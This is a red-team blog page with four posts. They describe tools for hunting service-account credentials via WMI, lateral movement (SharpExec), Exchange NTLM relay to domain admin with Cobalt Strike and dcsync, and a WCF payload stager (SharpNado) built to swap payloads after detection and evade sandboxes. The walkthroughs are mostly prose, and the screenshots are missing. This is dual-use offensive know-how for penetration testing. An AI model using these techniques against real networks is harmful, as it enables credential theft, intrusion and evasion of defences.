Pages

Tuesday, August 20, 2019

Finding Hidden Treasure on Owned Boxes: Post-Exploitation Enumeration with wmiServSessEnum


TLDR: We can use WMI queries to enumerate accounts configured to run any service on a box (even non-started / disabled), as well as perform live session enumeration.  Info on running the tool is in the bottom section.


Background


On a recent engagement I had gotten local admin privileges on ~20 boxes, and after querying active sessions on them got me nothing interesting I was ready to look for other potential escalation paths.  I ran secretsdump against several of the systems to grab local account hashes, and found that in the process of running it, I had also obtained plaintext credentials for a domain account that was not mentioned in any of the session enumeration information I had pulled.  This got me thinking about how this was possible, as well as how I could more reliably hunt for similar configurations on other systems I could remotely execute code on.

First, to explain what was going on – the NetWkstaUserEnum WINAPI function used by a majority of session enumeration tools is great at what it does, but only pulls data for active sessions on the remote system (interactive, service, and batch logins).  However, if a service is configured on the system but is currently not running, it will not be listed as a current session when enumerating the system.  This makes sense, as a non-running service has no processes associated with it.  After further investigation of the systems in question, I validated this is indeed what happened, as each of the systems was configured with a stopped service that would run using non-default credentials.

I’ve included an example below showing this in practice on a lab system using the GetNetLoggedOnUsers() functionality of @Cobbr_io’s SharpSploit, which uses the NetWkstaUserEnum WINAPI function to query sessions on a remote system, and a test service I configured (TestService) to run as the local ‘admin’ user on the box.  It shows that when the service is not running, the admin user is not enumerated (as expected):



For a bit more context on why this matters to us at all, we have to take a look at how credentials for service accounts are cached by Windows.  When a service is configured with a set of credentials to run as, the OS needs to store them so they don’t have to be re-entered every reboot / every time the service is ran.  Windows stores these service account credentials within the HKEY_LOCAL_MACHINE\Security registry hive, in an encrypted storage space known as LSA Secrets.  However, the passwords themselves, although encrypted, are stored as plaintext values (opposed to NTLM hashes).  Items stored in this space are only readable by NT_Authority/SYSTEM by default, but users with administrative rights on the system can create a backup of the registry hive that can subsequently be accessed and decrypted to extract the data contained within.  As the screengrab below shows, the credentials are sitting in LSA secrets, ready to be used whenever next needed.


And if we dump the contents of LSA secrets, we see we can actually retrieve the plaintext password for the account configured to run the service:


So at this point I was a bit stumped, how could I quickly and reliably enumerate accounts configured to run services on a relatively large number of remote systems?  It’s not really a best practice to start randomly secretsdumping boxes, and even if you threw opsec concerns to the wind it would still take a relatively long amount of time if you wanted to dump anything more than just a few systems.  With that in mind, I wanted something that would ideally be agentless, and could be ran in a multi-threaded process to increase collection speed against multiple systems. I settled on writing something that would check these boxes in c#, primarily as that’s what I’ve been doing the majority of my development in lately.



Building the Tool



Note: This section doesn’t have anything critical on the functionality or usage of the tool, but instead outlines the development process and roadblocks I ran into as I built it.  If this doesn’t interest you, I recommend scrolling through to the next section.

When I first sat down to write this tool, I thought WMI would be a good candidate to use for collection as I had some knowledge of the Win32_Service class and figured it would be pretty easy to pull the needed information from the remote system.  As I prepared to start coding I checked out similar projects that implemented WMI connectivity in .net applications.  From an offensive tooling standpoint, I didn’t find too much outside of tools designed to facilitate code execution, and overwhelmingly they appeared to use the older System.Management namespace to build their WMI objects. In my reading of Microsoft docs, I found that the newer Microsoft.Management.Infrastructure namespace was recommended to use to access WMI.


As I began to build out the functionality of the tool and started exploring other WMI classes I figured it would make sense to extend the tool’s functionality to also include the optional enumeration of sessions on the system via WMI, similar to the sessionEnum functionality seen earlier through SharpSploit.  To explore various WMI classes I used WMI Explorer (https://github.com/vinaypamnani/wmie2/releases) which provides a super helpful interface that allows you to browse WMI classes and get information on specific properties & methods.


Through this I found the  Win32_LoggedOnUser WMI class.  At first it seemed like this would be exactly what was needed for enumerating active sessions, and my initial tests worked great: I log in with user1, user1 shows up when I query the class, I log in with user2, user1 & user2 now show up when I query the class.  The issue came when I logged off with user2 and queried the class again; user2 still showed up as having a session on the system.  I tried giving it a few minutes, thinking that the session was temporarily caching on log-off, but still user2 appeared to be logged in when querying the class.  This led me to a bunch of googling and the unfortunate conclusion that the Win32_LoggedOnUser class tracks ALL login sessions since last reboot, including ‘stale’ connections, or those that are no longer exist.  This isn’t great for us, as these stale sessions do not retain cached credentials in memory by default, potentially leading to a plethora of false positives based on old logins.  There are definitely operational uses for this information, ex. looking for a system where there have been administrative logins at some point since last reboot – likely within the past month – and targeting them for long-term surveillance or persistence with the theory being that an admin may log in there again; however those uses are outside of the scope of this tool.

The array of session objects returned when querying the Win32_LoggedOnUser class have two properties: an antecedent, and a dependent.  The antecedent is the value that contains the ‘human-readable’ information regarding a specific session – the hostname, domain, etc.  The dependent contains a ‘loginID’ value, a unique int corresponding to the specific instance of an account logging into the system.  If a single user logs in & out multiple times prior to a reboot, each instance will receive a unique loginID and thus be tracked independently by the Win32_LoggedOnUser class. 


There wasn’t a whole lot I could do directly with the LoggedOnUser class to filter to only live sessions, but through a bit more exploration of WMI classes I landed on the Win32_SessionProcess class.  Similarly to LoggedOnUser, this class also only returns an antecedent and a dependent.  However, the antecedent and dependent values returned for objects of the SessionProcess class are different, with the antecedent containing the LoginID tied to each active process on the system and the dependent containing a handle to each of these processes.  Although by themselves there isn’t much that can be done with these values, the LoginID returned by SessionProcess can be cross-referenced against the LoginIDs associated with LoggedOnUser objects, giving a listing of actual logins (those that have at least one running process associated with their loginID).


Once this connection had been made, it was fairly straightforward to get session enumeration functionality up and running.  From there, everything was pretty much in its final state as far as functionality goes.  Things were looking good until I started using Wireshark to watch execution across the wire in real-time.  When enumerating sessions using the NetWkstaUserEnum WINAPI function, approximately 15 packets were sent over the wire.  When running session enumeration over WMI, that number was up to ~200 packets.  Quite a bit larger, but makes sense when considering that the session has to be set up and multiple requests have to be made (although if anyone can further update the queries to shave this number further I would be happy to include).  However, when I ran service enumeration, packet counts shot up to a monstrous ~1700 per host.  This was just simply too high for my liking, and I could imagine network congestion, downed boxes, etc. if this was ran over too many hosts in parallel.




The breakthrough in getting the amount of traffic sent over the wire down was the realization that the WQL query sent to retrieve objects was processed server-side.  WMI connectivity using the Microsoft.Management.Infrastructure namespace involves creating a CimSession to a remote host, which in turn is queried using a WQL (WMI-Query-Language) query.  This is a SQL-like statement that can be used to retrieve data based on certain criteria.  I had (mistakenly) assumed that filters applied to these queries (ex. select * from Win32_Service where startname like ‘%admin%’) would be applied to data after it was returned to our system; or in other words all the data would be pulled back across the wire, and then filtered using the given rules prior to displaying.  Luckily, I found this not to be the case, and the entire query is sent to the remote host where it is processed on their system.  From there, only results that match the given filter are sent back over the wire to our system.  Almost all services can be filtered out, as we’re not interested in those running under ‘default’ accounts such as SYSTEM, LOCAL SERVICE, and NETWORK SERVICE. With these new filters applied, traffic for service is down to a much more manageable ~170 packets per host (varies with # services identified).


One other interesting point that became apparent as I analyzed traffic from both WMI and API-based enumeration methods, this method uses solely RPC connections, whereas API methods use SMB to remotely pull information.  There are definitely improvements that can be made to this as well, API methods would likely be faster and may potentially be even lighter from a network traffic perspective (depending on what filtering can be done prior to returning service information), and the current queries could likely be further refined to likewise reduce traffic further. Overall though, with this last hurdle overcome, I figured the tool was in a decent enough place to release. 


wmiServSessEnum Usage


Like other tools that use WMI to connect to other systems, admin rights are required on the remote system.

An IP/ comma-separated list of IPs is required to be entered in on the command line when executing the tool, or a reference to a file on the local system containing one IP per line to target.  I looked into incorporating CIDR notation into the tool, but ultimately decided against it, so as of now only specific IP addresses are supported.  Ideally this shouldn’t be a huge deal as the addresses that are being tested are ones that you already have valid credentials for, meaning initial network enumeration has already occurred.  

By default the tool will use whatever credentials you’re currently running your session as, but also accepts username+domain+plaintext passwords (use a domain of ‘.’ For a local user).

WmiServSessEnum can be ran in several different modes:
·        sessions  – similar to other user enumeration methods, will return a list of active sessions on the remote system
·        services – returns a list (if any) of non-default accounts configured to run services on the remote system
·        all (default) – runs both

flags should be inputted in the format of –u=UserName etc.

When everything works you should get something back that looks like this when running against a remote system:

Friday, April 5, 2019

SharpExec - Lateral Movement With Your Favorite .NET Bling

TL;DR:

SharpExec is an offensive security C# tool designed to aid with lateral movement. While the techniques used are not groundbreaking or new by any means, every environment is different and what works for one situation might not work for the next.  This tool is a combination of code I have been using over the years when needing to move laterally in a Windows environment and due to various circumstances traditional tools weren't an option.  Below I will go over functionality, benefits, things to be aware of, etc.  If you are already tired of reading this, you can grab the source code or compiled tool from my github here: https://github.com/anthemtotheego/SharpExec

Current modules:
  • WMIExec - Semi-Interactive shell that runs as the user. Best described as a less mature version of Impacket's wmiexec.py tool.
  • SMBExec - Semi-Interactive shell that runs as NT Authority\System.  Best described as a less mature version of Impacket's smbexec.py tool.
  • PSExec (like functionality) - Gives the operator the ability to execute remote commands as NT Authority\System or upload a file and execute it with or without arguments as NT Authority\System.
  • WMI - Gives the operator the ability to execute remote commands as the user or upload a file and execute it with or without arguments as the user.
  • In the future I would like to add lateral movement through DCOM and pass the hash functionality
A few benefits:
  • Doesn't need to be supplied credentials if the current user running the program has the appropriate permissions (admin rights) to other remote systems.  This can come in handy when you compromise a system but don't have valid credentials yet.
  • The tool itself can be easily executed in memory, for example, using Cobalt Strike or SharpCradle.
  • Tools that are similar can behave differently enough that one tool's behavior gets flagged while the other one doesn't.
  • Sometimes you just don't feel like dealing with SSH tunneling or port forwarding just to run a specific tool and having other options is great.  
Things to be aware of:

When running the PSExec and SMBExec modules, please be aware that these are extremely noisy.  There will be a ton of log activity, so if you are testing a mature organization and your goal is not to get caught, you don't want to run these. Unfortunately though, many organizations still don't catch this type of activity and in most cases you are probably fine running these modules.  For a great rundown on how these types of tools work, check out this great blog series by @ropnop -  https://blog.ropnop.com/using-credentials-to-own-windows-boxes/

Like other tools with similar functionality, administrative rights are required.

Examples:

I have always been a fan of individuals who provide clear examples of using their tools and what behavior I should expect over the here is a tool, I wish you the best of luck approach.  So in this section I have tried to supply screenshots of various examples of using SharpExec.  Feel free to reach out to me on twitter @anthemtotheego if something doesn't make sense or is confusing.  This goes for any of my projects.

Running SharpExec without any arguments prints the help menu



The below example starts a semi-interactive shell to a remote domain joined system from a non-domain joined system using the WMIExec module























The below example starts a semi-interactive shell as user1 on the remote system using no username/password and then uses the get command available within the WMIExec/SMBExec modules to download a file from the remote system's current directory to your local system



The below example starts a semi-interactive shell as NT Authority\System on the remote system using no username/password and then uses the put command available within the WMIExec/SMBExec modules to upload a file from your local system to the remote system



The below example uploads the local binary noPowershell-noargs.exe to the remote system's C:\ drive and executes the binary via the WMI module.  It then waits for the user to press Enter before removing the file off of the remote system

The below example uses the PSExec module to execute a PowerShell Empire payload on the remote system via cmd.exe.  This will spawn a PowerShell Empire shell running as NT Authority\System


















The below example uses the tool SharpCradle.exe to pull SharpExec.exe into memory and execute the WMIExec module to gain a semi-interactive shell on the remote system




















Conclusion:

Hopefully this has been a good tutorial on a few ways to use SharpExec.  Till next time and happy hacking!

Link to tools:

SharpExec - https://github.com/anthemtotheego/SharpExec

SharpExec Compiled Binaries - https://github.com/anthemtotheego/SharpExec/tree/master/CompiledBinaries

SharpCradle GitHub - https://github.com/anthemtotheego/SharpCradle

Thursday, January 31, 2019

Red Teaming Made Easy with Exchange Privilege Escalation and PowerPriv


TL;DR: A new take on the recently released Exchange privilege escalation attack allowing for  remote usage without needing to drop files to disk, local admin rights, or knowing any passwords at all.  Any shell on a user account with a mailbox = domain admin.  I wrote a PowerShell implementation of PrivExchange that uses the credentials of the current user to authenticate to exchange.  Find it here: https://github.com/G0ldenGunSec/PowerPriv 



The Exchange attack that @_dirkjan released last week (https://dirkjanm.io/abusing-exchange-one-api-call-away-from-domain-admin) provides an extremely quick path to full domain control on most networks, especially those on which we already have a device that we can run our tools on, such as during an internal network penetration test.  However, I saw a bit of a gap from the point of a more red-team focused attack scenario, in which we often wouldn’t have a box on the internal client network that we can run python scripts on (such as ntlmrelayx and PrivExchange) without either installing python libraries or compiling the scripts to binaries and dropping them to disk to run.  Additionally, we may not have a user's plaintext or NTLM hashes to run scripts with remotely via proxychains.   

Trying to find a more effective solution for this scenario, I wrote a PowerShell implementation of PrivExchange called PowerPriv that uses the credentials of the current user to authenticate to the Exchange server.  This gets around the problem of needing credentials, as we’ll now just use the already-compromised account to authenticate for us.  However, this was really only a first step as it still required that we relay to the domain controller through ntlmrelayx, meaning that we would still need a box on the network running Linux / need to install Python / etc.  To put the rest of the pieces together, I used a bunch of the great tunneling functionality that comes in Cobalt Strike to set up a relay for the inbound NTLM authentication request (via HTTP) from the Exchange server, through our compromised host system, to the Cobalt Strike server, and back out to the target domain controller (via LDAP).  At a high level, this is what we’re doing: 
 

So, in more depth, what are we actually doing here?  To begin, let’s get a ‘compromised’ system and check who the local admins are:


Cool, we’re running as ‘tim’, a user who is not currently an admin on this system, but that shouldn’t matter.  Next, let's get our forwarding set up using the 'socks' + 'rportfwd' commands in Cobalt Strike and the /etc/proxychains.conf file:



We’re doing a few things here, setting up a reverse port forward to send traffic from port 80 on the compromised system to port 80 on our attacker system, and then setting up a SOCKS proxy to forward traffic back out through the compromised system over port 36529 on our box (the specific port used doesn’t matter).  

Once we've configured these, we can use proxychains to forward traffic through our SOCKS proxy set up on port 36259.  To perform the relay, we'll run ntlmrelayx, forwarding traffic through proxychains in order to get it back to the target environment. 


After this is up and running, we are ready to kick off the attack.  I’m using the PowerShell implementation of PrivExchange that I wrote called PowerPriv to authenticate using Tim's credentials.  In this example, all we need are the IPs of the Exchange server and the system which we currently have a shell on, since our compromised system will be relaying the incoming request to our attack server:



After this, we sit back and wait a minute for the NTLM authentication request to come back from the remote Exchange server:



Looks like our attack succeeded. Let's see if Tim can now perform a dcsync and get another user’s NTLM hash, even though Tim is only a lowly domain user:



A resounding success!  All without ever needing to know what Tim’s password is, perform any poisoning attacks, or drop files onto his system.   As to why we’re using the Cobalt Strike dcsync module vs secretsdump – in this scenario we do not have a plaintext password or NTLM hash for Tim (or any user), which would be required if we want to run secretsdump from our box via proxychains.  If you do have credentials, you can definitely use whichever method you prefer.

A few gotchas from during this process:
  • Make sure to use an appropriate type of malleable profile for your beacon. Don’t try and be fancy and send data over URIs or parameters.  Due to the nature of the relayed authentication we need to be able to quickly get the authentication request and forward it back out.  I also completed all testing using an interactive beacon, a 5-minute sleep isn’t going to work for this one.
  • I was initially having issues getting the dcsync working when using an FQDN (vs. the netbios name) of my target domain.  This was likely due to how I configured my naming conventions on my local domain, but something to be aware of.
  • In this example, my Cobalt Strike teamserver was running on the same box as my Cobalt Strike operator console (I was not connecting to a remote team server).  If you have a remote team server, this is where you would need to set up your relay, as this is where the the reverse port fwd would be dumped out to. (May need further testing)


Notes and links:
@_Dirkjan’s blog which covers the actual Exchange priv esc bug that he found in greater depth: https://dirkjanm.io/abusing-exchange-one-api-call-away-from-domain-admin/

Github Repo for PowerPriv: https://github.com/G0ldenGunSec/PowerPriv

Github Repo for ntlmrelayx: https://github.com/SecureAuthCorp/impacket

Cobalt Strike resources on port fwd’ing and SOCKS proxies: https://www.youtube.com/watch?v=bwq0ToNPCtg

*This technique was demonstrated in the article with Cobalt Strike.  However, this same vector is possible using other agents that support port forwarding and proxying, such as Meterpreter.

Wednesday, December 19, 2018

SharpNado - Teaching an old dog evil tricks using .NET Remoting or WCF to host smarter and dynamic payloads

TL;DR:

SharpNado is proof of concept tool that demonstrates how one could use .Net Remoting or Windows Communication Foundation (WCF) to host smarter and dynamic .NET payloads.  SharpNado is not meant to be a full functioning, robust, payload delivery system nor is it anything groundbreaking. It's merely something to get the creative juices flowing on how one could use these technologies or others to create dynamic and hopefully smarter payloads. I have provided a few simple examples of how this could be used to either dynamically execute base64 assemblies in memory or dynamically compile source code and execute it in memory.  This, however, could be expanded upon to include different kinds of stagers, payloads, protocols, etc.

So, what is WCF and .NET Remoting?

While going over these is beyond the scope of this blog, Microsoft describes Windows Communication Foundation as a framework for building service-oriented applications and .NET Remoting as a framework that allows objects living in different AppDomains, processes, and machines to communicate with each other.  For the sake of simplicity, let's just say one of its use cases is it allows two applications living on different systems to share information back and forth with each other. You can read more about them here:

WCF

.NET Remoting

 A few examples of how this could be useful:

1. Smarter payloads without the bulk

What do I mean by this?  Since WCF and .NET Remoting are designed for communication between applications, it allows us to build in logic server side to make smarter decisions depending on what information the client (stager) sends back to the server.  This means our stager can still stay small and flexible but we can also build in complex rules server side that allow us to change what the stager executes depending on environmental situations.  A very simple example of payload logic would be the classic, if domain user equals X fire and if not don't.  While this doesn't seem very climatic, you could easily build in more complex rules.  For example, if the domain user equals X,  the internal domain is correct and user X has administrative rights, run payload Y or if user X is a standard user, and the internal domain is correct, run payload Z.  Adding to this, we could say if user X is correct, but the internal domain is a mismatch, send back the correct internal domain and let me choose if I want to fire the payload or not.  These back-end rules can be as simple or complex as you like.  I have provided a simple sandbox evasion example with SharpNado that could be expanded upon and a quick walk through of it in the examples section below.

2. Payloads can be dynamic and quickly changed on the fly:

Before diving into this, let's talk about some traditional ways of payload delivery first and then get into how using a technology like WCF or .NET Remoting could be helpful.  In the past and even still today, many people hard-code their malicious code into the payload sent, often using some form of encryption that only decrypts and executes upon meeting some environmental variable or often they use a staged approach where the non-malicious stager reaches out to the web, retrieves our malicious code and executes it as long as environmental variables align.  The above examples are fine and still work well even today and I am in no way tearing these down at all or saying better ways don't exist.  I am just using them as a starting point to show how I believe the below could be used as a helpful technique and up the game a bit, so just roll with it.

So what are a few of the pain points of the traditional payload delivery methods?  Well with the hard-coded payload, we usually want to keep our payloads small so the complexity of our malicious code we execute is minimal, hence the reason many use a stager as the first step of our payload.  Secondly, if we sent out 10 payloads and the first one gets caught by end point protection, then even if the other 9 also get executed by their target, they too will fail.  So, we would have to create a new payload, pick 10 new targets and again hope for the best.

Using WCF or .NET Remoting we can easily create a light stager that allows us to quickly switch between what the stager will execute.  We can do this either by back-end server logic as discussed above or by quickly setting different payloads within the SharpNado console.  So, let's say our first payload gets blocked by endpoint protection. Since we already know our stager did try to execute our first payload due to the way the stager/server communicate we can use our deductive reason skills to conclude that our stager is good but the malicious code it tried to execute got caught. We can quickly, in the console, switch our payload to our super stealthy payload and the next time any of the stagers execute, the super stealthy payload will fire instead of the original payload which got caught. This saves us the hassle of sending a new payload to new targets.  I have provided simple examples of how to do this with SharpNado that could be expanded upon and a quick walk through of it in the examples section below.

3. Less complex to setup:

You might be thinking to yourself that I could do all this with mod rewrite rules and while that is absolutely true, mod rewrite rules can be a little more complex and time consuming to setup.  This is not meant to replace mod rewrite or anything.  Long live mod rewrite!  I am just pointing out that writing your back-end rules in a language like C# can allow easier to follow rules, modularization, and data parsing/presentation.

4. Payloads aren't directly exposed:

What do I mean by this?  You can't just point a web browser at your server IP and see payloads hanging out in some open web directory to be analyzed/downloaded.  In order to capture payloads, you would have to have some form of MiTM between the stager and the server.  This is because when using WCF or .NET Remoting, the malicious code (payload) you want your stager to execute along with any complex logic we want to run sits behind our remote server interface.  That remote interface exposes only the remote server side methods which can then be called by your stager. Now, if at this point you are thinking WTF, I encourage you to review the above links and dive deeper into how WCF or .NET Remoting works.  As there are many people who explain it and understand it better than I ever will.

Keep in mind, that you would still want to encrypt all of your payloads before they are sent over the wire to better protect your payloads.  You would also want to use other evasion techniques, for example, amount of times the stager has been called or how much time has passed since the stager was sent, etc.

5. Been around awhile:

.NET Remoting and WCF have been around a long time. There are tons of examples out there from developers on lots of ways to use this technology legitimately and it is probably a pretty safe bet that there are still a lot of organizations using this technology in legit applications. Like you, I like exposing ways one might do evil with things people use for legit purposes and hopefully bring them to light. Lastly, the above concepts could be used with other technologies as well, this just highlights one of many ways to accomplish the same goal.

Examples:

Simple dynamic + encrypted payload example:

In the first example we will use SharpNado to host a base64 version of SharpSploitConsole and execute Mimikatz logonpasswords function.  First, we will setup our XML payload template that the server will be able to use when our stager executes.  Payload template examples can be found on GitHub in the Payloads folder.  Keep in mind that the ultimate goal would be to have many payload templates already setup that you could quickly switch between. The below screenshots give an example of what the template would look like.

Template example:

This is what it would look like after pasting in base64 code and setting arguments:














Once we have our template payload setup, we can go ahead and run SharpNado_x64.exe (with Administrator rights) and setup our listening service that our stager will call out to. In this example we will use WCF over HTTP on port 8080.  So, our stager should be setup to connect to http://192.168.55.250:8080/Evil.  I would like to note two things here.  First is that with a little bit of work upfront server side, this could be modified to support HTTPS and secondly, SharpNado does not depend on the templates being setup prior to running.  You can add/delete/modify templates any time while the server is running using whatever text editor you would like.




























Now let's see what payloads we currently have available.  Keep in mind you may use any naming scheme you would like for your payloads.  I suggest naming payloads and stagers what makes most sense to you.  I only named them this way to make it easier to follow along.









In this example I will be using the b64SharpSploitConsole payload and have decided that I want the payload to be encrypted server side and decrypted client side using the super secure password P@55w0rd.  I would like to note here (outlined in red) that it is important for you to set your payload directory correctly.  This directory is what SharpNado uses to pull payloads.  A good way to test this is to run the command "show payloads" and if your payloads show up, you know you set it correctly.

























Lastly, we will setup our stager.  Since I am deciding to encrypt our payload, I will be using the example SharpNado_HTTP_WCF_Base64_Encrypted.cs stager example found in the Stagers folder on GitHub.  I will simply be compiling this and running the stager exe but this could be delivered via .NetToJScript or by some other means if you like.






































Now that we have compiled our stager, we will start the SharpNado service by issuing the "run" command.  This shows us what interface is up and what the service is listening on, so it is good to check this to make sure again, that everything is setup correctly.




Now when our stager gets executed, we should see the below.

















And on our server side we can see that the encrypted server method was indeed called by our stager.  Keep in mind, we can build in as much server logic as we like.  This is just an example.



Now for demo purposes, I will quickly change the payload to b64NoPowershell_ipconfig_1 and when we run the same exact stager again, we instead will show our ipconfig information.  Again, this is only for simple demonstration of how you can quickly change out payloads.











Simple sandbox evade example:

In this second example I will go over an extremely watered-down version of how you could use SharpNado to build smarter payloads.  The example provided with SharpNado is intended to be a building block and could be made as complex or simple as you like.  Since our SharpNado service is already running from or previous example, all we need to do is set our payloads to use in the SharpNado console.  For this example, I again will be using the same payloads from above. I will run the b64SharpSploitConsole payload if we hit our correct target and the b64NoPowershell_ipconfig_1 payload if we don't hit our correct target.



Looking at our simple stager example below we can see that if the user anthem is who executed our stager, the stager will send a 1 back to the SharpNado service or a 0 will be sent if the user isn't anthem.  Please keep in mind you could however send back any information you like, including username, domain, etc.






















Below is a partial screenshot of the example logic I provided with SharpNado. Another thing I want to point out is that I provided an example of how you could count how many times the service method has been called and depending on threshold kill the service.  This would be an example of building in counter measures if we think we are being analyzed and/or sand-boxed.



Moving forward when we run our stager with our anthem user, we can see that we get a message server side and that the correct payload fired.





















Now if I change the user to anthem2 and go through the process again.  We can see that our non-malicious payload fires.  Keep in mind, the stagers could be setup in a way that values aren't hard coded in.  You could have a list of users on your server and have your stager loop through that list and if anything matches, execute and if not do something else.  Again, it's really up to your imagination.

Compile source code on the fly example:

Let's do one more quick example but using C# source code.  This stager method will use System.CodeDom.Compiler which does shortly drop stuff to disk right before executing in memory but one could create a stager that takes advantage of the open source C# and VB compiler Roslyn to do the same thing.  This doesn't touch disk as pointed out by @cobbr_io in his SharpShell blog post.

The below payload template example runs a No PowerShell payload that executes ipconfig but I also provided an example that would execute a PowerShell Empire or PowerShell Cobalt Strike Beacon on GitHub:































Then we will setup our stager.  In this example I will use the provided GitHub stager SharpNado_HTTP_WCF_SourceCompile.cs.






































We will then take our already running SharpNado service and quickly add our payload.



Now when we run our stager, we should see our ipconfig output.







Conclusion:

Hopefully this has been a good intro to how one could use WCF or .NET Remoting offensively or at least sparked a few ideas for you to research on your own. I am positive that there are much better ways to accomplish this, but it was something that I came across while doing other research and I thought it would be neat to whip up a small POC.  Till next time and happy hacking!

Link to tools:

SharpNado - https://github.com/anthemtotheego/SharpNado

SharpNado Compiled Binaries - https://github.com/anthemtotheego/SharpNado/tree/master/CompiledBinaries

SharpSploitConsole - https://github.com/anthemtotheego/SharpSploitConsole

SharpSploit - https://github.com/cobbr/SharpSploit